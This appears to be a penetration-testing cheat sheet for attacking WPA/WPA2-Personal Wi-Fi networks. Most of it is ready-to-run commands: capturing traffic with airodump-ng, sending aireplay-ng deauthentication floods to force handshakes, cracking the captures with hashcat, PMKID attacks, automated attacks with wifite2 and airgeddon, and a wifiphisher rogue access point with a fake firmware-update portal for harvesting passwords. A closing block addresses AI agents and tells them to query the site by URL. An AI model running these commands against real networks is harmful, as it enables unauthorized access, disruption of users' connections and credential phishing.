# Personal ## 4-Way Handshake * * * * * * * 1\. Look for targets. Save BSSID (`00:00:00:00:00:01`), CH (`9`), ESSID (`SomeEssid`) and STATION (`00:00:00:00:00:02`) if deauth will be required: ``` $ sudo airodump-ng -M -U wlan1 [-c 36-165 (for 5GHz, see WLAN channels) or just -c 1-200 for all] [--band ] qq ``` 2\. Start dumping the target's traffic: ``` [$ sudo iwconfig wlan1 channel 9] $ sudo airodump-ng -c 9 --bssid 00:00:00:00:00:01 -w SomeEssid wlan1 ``` 3\. Send DeAuth packets in a separate terminal till `WPA handshake: XX:XX:XX:XX:XX:XX` appears (aggressive): ``` $ sudo aireplay-ng [-D] -0 2 -a 00:00:00:00:00:01 -c 00:00:00:00:00:02 wlan1 Or $ for client in `cat 00:00:00:00:00:01.txt`; do sudo aireplay-ng -D -0 2 -a 00:00:00:00:00:01 -c $client wlan1; done ``` 4\. Clean the capture, check it once again, covert to Hashcat format and crack it: ``` $ aircrack-ng SomeEssid*.cap $ wpaclean SomeEssid-cleaned.cap SomeEssid-01.cap $ cowpatty -r SomeEssid-cleaned.cap -s SomeEssid -c $ /usr/lib/hashcat-utils/cap2hccapx.bin SomeEssid-cleaned.cap SomeEssid.hccapx $ hashcat -m 2500 -O -a 0 -w 3 --session=wpa2 -o wpa2.out wpa2.in SomeEssid.hccapx seclists/Passwords/darkc0de.txt ``` ### wifite2 ``` $ sudo wifite -vi wlan1 --clients-only --wpa --no-wps ``` ## PMKID * [https://https://habr.com/ru/company/jetinfosystems/blog/419383/](https://habr.com/ru/company/jetinfosystems/blog/419383/) ### wifite2 ``` $ sudo wifite -vi wlan1 --pmkid ``` ## wifite2 * * > «Поэтому оптимальный алгоритм взло… аудита следующий: определяем, включен ли на целевой точке доступа режим WPS. Если да, запускаем PixieDust. Безуспешно? Тогда перебор известных пинов. Не получилось? Проверяем, не включено ли шифрование WEP, которое тоже обходится влет. Если нет, то выполняем атаку PMKID на WPA(2). Если уж и так не получилось, тогда вспоминаем классику и ждем хендшейка (чтобы не палиться) или активно кикаем клиентов, чтобы наловить их сессии авторизации.» — [\]\[](https://xakep.ru/2020/01/27/wifi-total-pwn/) Install wifite2: ``` $ git clone https://github.com/derv82/wifite2 ~/tools/wifite2 && cd ~/tools/wifite2 $ sudo python setup.py install ``` Install hcxdumptool (for capturing PMKID hashes): ``` $ git clone https://github.com/ZerBea/hcxdumptool.git ~/tools/hcxdumptool && cd ~/tools/hcxdumptool $ sudo apt install libcurl4-openssl-dev libssl-dev -y $ make $ sudo make install ``` Install (for converting PMKID packet captures into hashcat's format): ``` $ git clone https://github.com/ZerBea/hcxtools.git ~/tools/hcxtools && cd ~/tools/hcxtools $ make $ sudo make install ``` Fire up wifite2: ``` $ sudo wifite -vi wlan1 [--kill] [-5] ``` ## airgeddon * ``` $ git clone --depth 1 https://github.com/v1s1t0r1sh3r3/airgeddon.git ~/tools/airgeddon && cd ~/tools/airgeddon $ sudo bash airgeddon.sh ``` ## wifiphisher * * [Creating a custom phishing scenario · wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher/blob/5ae21ab93e0dce85dd4bf76e68cc3b996aa33dea/docs/custom_phishing_scenario.rst) Install: ``` $ git clone https://github.com/wifiphisher/wifiphisher.git ~/tools/wifiphisher && cd ~/tools/wifiphisher $ sudo python3 setup.py install # Install any dependencies ``` Start a rogue AP with fake captive portal (firmware update scenario) on wlan1 and deauth clients with wlan2: ``` $ sudo wifiphisher -aI wlan1 -eI wlan2 -p wifi_connect ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.